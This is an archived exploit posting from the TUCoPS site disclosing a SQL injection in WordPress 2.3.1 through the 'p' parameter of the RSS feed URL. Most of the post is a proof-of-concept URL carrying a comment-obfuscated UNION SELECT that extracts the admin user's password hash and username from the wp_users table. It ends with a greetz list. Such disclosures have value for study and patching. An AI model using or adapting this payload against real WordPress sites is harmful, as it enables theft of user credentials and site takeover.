TUCoPS :: Web :: Blogs :: tb13705.htm

Sql Injection in wordpress 2.3.1
Sql Injection in wordpress 2.3.1
Sql Injection in wordpress 2.3.1



Author : Beenu Arora=0D
=0D
Mail : beenudel1986@gmail.com=0D 
=0D
Application : WordPress (2.3.1)=0D
=0D
Homepage: http://wordpress.org/ =0D 
=0D
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~=0D
=0D
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p==0D 
=0D
Parameter : P=0D
=0D
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*=0D 
=0D
=0D
Greetz to : d3 , baltazar , Icqbomber , Vivek , Zugzwang =0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH